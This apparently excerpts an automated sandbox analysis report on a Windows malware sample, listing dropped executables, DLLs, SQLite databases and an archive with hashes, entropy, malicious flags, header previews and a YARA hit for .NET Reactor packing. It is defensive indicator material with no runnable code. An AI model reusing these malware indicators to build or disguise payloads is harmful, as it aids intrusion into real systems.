                                                                                                                                                                                                                                                                                                                                • Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\AppData\Local\Temp\B013.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..z+..6......@.i.. ....+...@.. .......................`x.....s.I...@.................................:.;.P.... ;..x............H..............................................................................................text.....+.. ...z+................. ..` 2....+......~+.............@..@.reloc........:......(7.............@..B.idata... ....;......*7.............@....rsrc....z... ;..z...,7.............@..@.themida..+...=.......9.............`....boot........`i.......9.............`..`........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):600849
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.937470308250879
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:7DDcoSaYu6NCMDJCxEwJCxEKJCxElHvQmMYxf5EqEeSMk5A3ZqpVaM2DKBF4dBgc:XzKu6NCM1k+pPQmtkqEeSMk5e4t224dV
                                                                                                                                                                                                                                                                                                                                MD5:08DEB048589E4E6D6F16AB66BD1020F8
                                                                                                                                                                                                                                                                                                                                SHA1:F8C229E1EC9D91FD7CDCCACFE6BC6B8A24F5C703
                                                                                                                                                                                                                                                                                                                                SHA-256:373C9D5774B17374C04EAAE846091B37D00CCD6052D8A877F0A3595D8EC28251
                                                                                                                                                                                                                                                                                                                                SHA-512:FBC921B7947F22496D75ED642DB82070D1BEF81C3B5C5960FFB308663EC6E311064F4252429F1F89E3C68D607E0331230E6C181454E71FB941521B4CDD88B053
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.BJ:.,.:.,.:.,.$.. .,.$..*.,.$..}.,...q.9.,.:.-.u.,.3..;.,.3..;.,.Rich:.,.........................PE..L...o*.e............................{A............@..........................p.......................................@..D...<...(....................................................................................................................bss....:%.......&.................. ..`.text....a...@...b...*.............. ..`.rdata..............................@..@.data....e.......\..................@....frAQB...0...@...'.....................@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):249344
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.554987671373836
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:9fgWDcLCLpzUhZ4ZmIipZIDqSB5O6AyUoHYYzKnNMX2RFu1aMKwX7jA:V1DcL4Qr2iDIDH+6hsnnNVu1CSj
                                                                                                                                                                                                                                                                                                                                MD5:F98FBCB2A906CCA96365F1D00E6EDEB4
                                                                                                                                                                                                                                                                                                                                SHA1:B4035DC8CE49FCDAA9FB4E893EDFE991C59798F3
                                                                                                                                                                                                                                                                                                                                SHA-256:A8E103DE62FAFFAA06F37726B86C2348C81BE7C7FDE53ABE33A91D0A2BD00BA2
                                                                                                                                                                                                                                                                                                                                SHA-512:4943B036C8B76F85D0CD2F85B4B0BDAE4EB48DEAD636CD52BC18DA79D92C655BCC5A6A8ECFDE87DC6247867EFE12AC1ACF37E91484D5346495C0D70D4F9A388A
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......c......................C......<.......0....@...........................E......+......................................XZ..<.....D..j...........................1...............................M..@............0...............................text............................... ..`.rdata..B3...0...4..................@..@.data...|.B..p.......N..............@....rsrc....j....D..l...b..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4329368
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.982049123995223
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:98304:CAbPj3kOn93eklPAPvT5GWcFqx9IvE4Vls+S4G8m1ImW:RbPDkulIPrw5FW9KEusNIL
                                                                                                                                                                                                                                                                                                                                MD5:2263495C4A9413605BA6D61AFE170F1F
                                                                                                                                                                                                                                                                                                                                SHA1:44521BCA31845C6D939ED653271AFD220EEE210E
                                                                                                                                                                                                                                                                                                                                SHA-256:84D2FE301ED279B7EABA19BF5CFE6597FC2581519C638532FE106C3D25C9CF9D
                                                                                                                                                                                                                                                                                                                                SHA-512:F58CEC4831157D21B242E08B62CBD1224660B722D8D13B282563D7DB2450BEF35CF4FAEB4C128F5A390CD031E62F07B0B8B2D82D7DD6E0BED05085F97187039B
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L....Yc.................L@...D......<.......`@...@.......................... ........B.....................................h.@.<........j............B..............a@..............................}@.@............`@..............................text....J@......L@................. ..`.rdata..R3...`@..4...P@.............@..@.data...|.B...@.......@.............@....rsrc....j.......l....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8459133
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999567437968656
                                                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                                                SSDEEP:196608:d1PV0mZguo5QRBWmIb/pK9509vlh3SyWpdLo4zSOwjeyg/Uu+0F:rd+Orq/A9503W3LHdsey+wu
                                                                                                                                                                                                                                                                                                                                MD5:EA7FF3104CAA0FF12EEF81A13532235C
                                                                                                                                                                                                                                                                                                                                SHA1:6A697E62145D552C2E7FE93D0A1B4B1BB5B6E66B
                                                                                                                                                                                                                                                                                                                                SHA-256:EF5D559E423ED18CEE7799A7EA087E1CCA9233B0202F7950920F18804C69E1B1
                                                                                                                                                                                                                                                                                                                                SHA-512:DBCBA2124B484A8D3E6320A87AB7929C10FA24F92DA470C24A964F7B729C4E5C59CC48C836E59C9045E1AA55A6B66A5F408F235395C4AB1769DBA21599C4F3BE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....e.....................F......@.............@..........................@...................@..............................P........,..........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS.....L................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):87864
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.50974924823557
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:JiOTTyNdd/mqN5fomseOpLJ5UP4nVnWecbtGgcNZVKL:JD4Vzgh5UXecbt2ju
                                                                                                                                                                                                                                                                                                                                MD5:89A24C66E7A522F1E0016B1D0B4316DC
                                                                                                                                                                                                                                                                                                                                SHA1:5340DD64CFE26E3D5F68F7ED344C4FD96FBD0D42
                                                                                                                                                                                                                                                                                                                                SHA-256:3096CAFB6A21B6D28CF4FE2DD85814F599412C0FE1EF090DD08D1C03AFFE9AB6
                                                                                                                                                                                                                                                                                                                                SHA-512:E88E0459744A950829CD508A93E2EF0061293AB32FACD9D8951686CBE271B34460EFD159FD8EC4AA96FF8A629741006458B166E5CFF21F35D049AD059BC56A1A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).uym~.*m~.*m~.*...*o~.*d..*f~.*m~.*F~.*V .+n~.*V .+g~.*V .+f~.*V .+s~.*V .+l~.*V .*l~.*V .+l~.*Richm~.*........PE..d....Z.........." .........T......@........................................p......m.....`A........................................0...4...d........P.......0..........8?...`..p...p...8............................................................................text...'........................... ..`.rdata..f5.......6..................@..@.data........ ......................@....pdata.......0......................@..@_RDATA.......@......................@..@.rsrc........P......................@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):94736
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.337586298062742
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:DGb6DBCvurMRnQhVx8/Nlv+SSm9YmFN87Xgq4ToV+dypRI84VAyE:abfXyg7pp9TC7Xgq4ToV+kRI84VY
                                                                                                                                                                                                                                                                                                                                MD5:CF77513525FC652BAD6C7F85E192E94B
                                                                                                                                                                                                                                                                                                                                SHA1:23EC3BB9CDC356500EC192CAC16906864D5E9A81
                                                                                                                                                                                                                                                                                                                                SHA-256:8BCE02E8D44003C5301608B1722F7E26AADA2A03D731FA92A48C124DB40E2E41
                                                                                                                                                                                                                                                                                                                                SHA-512:DBC1BA8794CE2D027145C78B7E1FC842FFBABB090ABF9C29044657BDECD44396014B4F7C2B896DE18AAD6CFA113A4841A9CA567E501A6247832B205FE39584A9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e.l..k?..k?..k?.|.?..k?.Zj>..k?B..?..k?.Zh>..k?.Zn>..k?.Zo>..k?vZj>..k?.lj>..k?..j?..k?vZc>..k?vZk>..k?vZ.?..k?vZi>..k?Rich..k?........PE..d...z.:_.........." .........j......$...............................................<6....`........................................../..H...80...............`.......X..................T............................................................................text............................... ..`.rdata...;.......<..................@..@.data........@.......0..............@....pdata.......`.......>..............@..@.gfids.......p.......H..............@..@.rsrc................J..............@..@.reloc...............V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):132624
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.962671714439977
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:bRyGuR/8oD9tR2yHBIjxBaVGTODsAR04D0RfUGpd0/b8aMgiadI8VPEye:bcDd8oM+kBVQ/8f5pdObL7dI8VPG
                                                                                                                                                                                                                                                                                                                                MD5:5E869EEBB6169CE66225EB6725D5BE4A
                                                                                                                                                                                                                                                                                                                                SHA1:747887DA0D7AB152E1D54608C430E78192D5A788
                                                                                                                                                                                                                                                                                                                                SHA-256:430F1886CAF059F05CDE6EB2E8D96FEB25982749A151231E471E4B8D7F54F173
                                                                                                                                                                                                                                                                                                                                SHA-512:FEB6888BB61E271B1670317435EE8653DEDD559263788FBF9A7766BC952DEFD7A43E7C3D9F539673C262ABEDD97B0C4DD707F0F5339B1C1570DB4E25DA804A16
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........$\.kw\.kw\.kwU..wZ.kwg.jv^.kwg.hv_.kwg.nvV.kwg.ovV.kw..jv^.kw..ov].kw..jv[.kw\.jw..kw..hv].kw..cvT.kw..kv].kw..w].kw..iv].kwRich\.kw........................PE..d...r.:_.........." .........................................................@....../G....`.......................................................... .......................0.......e..T............................f...............0...............................text............................... ..`.rdata..pq...0...r..................@..@.data....9.......4..................@....pdata..............................@..@.gfids..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):38928
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.959951673192366
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:AyvaHXGH0o9MBl7nqHQ03dpI8sIZhWDG4yfkO:UKnyBlmHQadpI8sIZcyMO
                                                                                                                                                                                                                                                                                                                                MD5:B32CB9615A9BADA55E8F20DCEA2FBF48
                                                                                                                                                                                                                                                                                                                                SHA1:A9C6E2D44B07B31C898A6D83B7093BF90915062D
                                                                                                                                                                                                                                                                                                                                SHA-256:CA4F433A68C3921526F31F46D8A45709B946BBD40F04A4CFC6C245CB9EE0EAB5
                                                                                                                                                                                                                                                                                                                                SHA-512:5C583292DE2BA33A3FC1129DFB4E2429FF2A30EEAF9C0BCFF6CCA487921F0CA02C3002B24353832504C3EEC96A7B2C507F455B18717BCD11B239BBBBD79FADBE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%_..a>..a>..a>..hF^.c>..Z`..c>..Z`..c>..Z`..k>..Z`..k>...`..c>..:V..c>...W..b>..a>..8>...`..`>...`..`>...`2.`>...`..`>..Richa>..................PE..d...y.:_.........." .....6...J.......4....................................................`..........................................e..P...`e..x....................~..............0[..T............................[...............P...............................text....5.......6.................. ..`.rdata..p ...P..."...:..............@..@.data...0............\..............@....pdata...............h..............@..@.gfids...............n..............@..@.rsrc................p..............@..@.reloc...............|..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):176144
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.6945247495968045
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:KCvUDHEIzx6yBexOV3fNDjGTtDlQxueKd03DV8tv9XIGIPExZJV9mNoA2v1kqnfE:tvUtdBexOlNDk+xTKg8tlJKyXYOAC1Lc
                                                                                                                                                                                                                                                                                                                                MD5:5FBB728A3B3ABBDD830033586183A206
                                                                                                                                                                                                                                                                                                                                SHA1:066FDE2FA80485C4F22E0552A4D433584D672A54
                                                                                                                                                                                                                                                                                                                                SHA-256:F9BC6036D9E4D57D08848418367743FB608434C04434AB07DA9DABE4725F9A9B
                                                                                                                                                                                                                                                                                                                                SHA-512:31E7C9FE9D8680378F8E3EA4473461BA830DF2D80A3E24E5D02A106128D048430E5D5558C0B99EC51C3D1892C76E4BAA14D63D1EC1FC6B1728858AA2A255B2FB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........).o.z.o.z.o.z..7z.o.z.1.{.o.z.1.{.o.z.1.{.o.z.1.{.o.zi1.{.o.z...{.o.z.o.z.o.zi1.{.o.zi1.{.o.zi1[z.o.zi1.{.o.zRich.o.z........................PE..d.....:_.........." ................H.....................................................`.........................................PW..L....W..x...............t...............@....3..T............................4...............................................text...#........................... ..`.rdata..............................@..@.data........p.......T..............@....pdata..t............n..............@..@.gfids..............................@..@.rsrc...............................@..@.reloc..@...........................@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):76816
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.0942584309558985
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:vG/A9Fu5OEPenRXk5d2jw/hEdFcvY+RgOmkcH7dI8VwYyo:e/Anu5OEPenRXRjw/h0FcvYcgOmkcbdV
                                                                                                                                                                                                                                                                                                                                MD5:8EA18D0EEAE9044C278D2EA7A1DBAE36
                                                                                                                                                                                                                                                                                                                                SHA1:DE210842DA8CB1CB14318789575D65117D14E728
                                                                                                                                                                                                                                                                                                                                SHA-256:9822C258A9D25062E51EAFC45D62ED19722E0450A212668F6737EB3BFE3A41C2
                                                                                                                                                                                                                                                                                                                                SHA-512:D275CE71D422CFAACEF1220DC1F35AFBA14B38A205623E3652766DB11621B2A1D80C5D0FB0A7DF19402EBE48603E76B8F8852F6CBFF95A181D33E797476029F0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%A..K...K...K......K..J...K..H...K..N...K..O...K.G.J...K...J...K...J.A.K.G.C...K.G.K...K.G.....K.G.I...K.Rich..K.........PE..d...~.:_.........." .....x...........v.......................................`....... ....`.........................................0...P............@....... ...............P.........T...........................@................................................text...cw.......x.................. ..`.rdata..bA.......B...|..............@..@.data....=.......8..................@....pdata....... ......................@..@.gfids.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):120848
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.015568704435241
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:B9+/8UxGzqHYjeS0Woia4TMpi6EPQNvURI847uHV:b+UUxGiY8Wo1UVV
                                                                                                                                                                                                                                                                                                                                MD5:5A393BB4F3AE499541356E57A766EB6A
                                                                                                                                                                                                                                                                                                                                SHA1:908F68F4EA1A754FD31EDB662332CF0DF238CF9A
                                                                                                                                                                                                                                                                                                                                SHA-256:B6593B3AF0E993FD5043A7EAB327409F4BF8CDCD8336ACA97DBE6325AEFDB047
                                                                                                                                                                                                                                                                                                                                SHA-512:958584FD4EFAA5DD301CBCECBFC8927F9D2CAEC9E2826B2AF9257C5EEFB4B0B81DBBADBD3C1D867F56705C854284666F98D428DC2377CCC49F8E1F9BBBED158F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a...............x2......^.......^.......^.......^......k^......Zi.......h..............k^......k^......k^^.....k^......Rich....................PE..d.....:_.........." .....................................................................`..........................................;..d...T<..................................h....%..T............................&..................8............................text...s........................... ..`.rdata..r...........................@..@.data....N...p...J...P..............@....pdata..............................@..@.gfids..............................@..@.rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):69648
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.022045168499411
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:wZSaB9UmU+YBYGnmmwe06hcvfyRiDpI8sS1yh:wZSDoe0FvfyRiDpI8sSo
                                                                                                                                                                                                                                                                                                                                MD5:09F66528018FFEF916899845D6632307
                                                                                                                                                                                                                                                                                                                                SHA1:CF9DDAD46180EF05A306DCB05FDB6F24912A69CE
                                                                                                                                                                                                                                                                                                                                SHA-256:34D89FE378FC10351D127FB85427449F31595ECCF9F5D17760B36709DD1449B9
                                                                                                                                                                                                                                                                                                                                SHA-512:ED406792D8A533DB71BD71859EDBB2C69A828937757AFEC1A83FD1EACB1E5E6EC9AFE3AA5E796FA1F518578F6D64FF19D64F64C9601760B7600A383EFE82B3DE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9.r{}..(}..(}..(t..({..(F..)...(F..)...(F..)v..(F..)w..(..)...(&..)...(...)x..(}..(...(..)...(..)|..(..(|..(..)|..(Rich}..(........................PE..d.....:_.........." .....~...|......HP.......................................P.......P....`.........................................P...P............0..........,............@......P...T............................................................................text...S}.......~.................. ..`.rdata...C.......D..................@..@.data...h...........................@....pdata..,...........................@..@.gfids....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1024268
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.540443460646943
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:PGHcjTosQNRs54PK4IOGpiD8pVi+ZEf6EfmLSKvFVLJ:PGHcjTosQNRs54PK4IPZ7LvZ
                                                                                                                                                                                                                                                                                                                                MD5:8386CF8ADD72BAB03573064B6E1D89D2
                                                                                                                                                                                                                                                                                                                                SHA1:C451D2F3EED6B944543F19C5BD15AE7E8832BBD4
                                                                                                                                                                                                                                                                                                                                SHA-256:2EEA4B6202A6A6F61CB4D75C78BE5EC2E1052897F54973797885F2C3B24D202C
                                                                                                                                                                                                                                                                                                                                SHA-512:2BB61F7FAC7ECC7D5654756AE8286D5FD9E2730E6AC42F3E7516F598E00FD8B9B6D3E77373994BB31D89831278E6833D379F306D52033FA5C48A786AC67DA2B2
                                                                                                                                                                                                                                                                                                                                Malicious:false
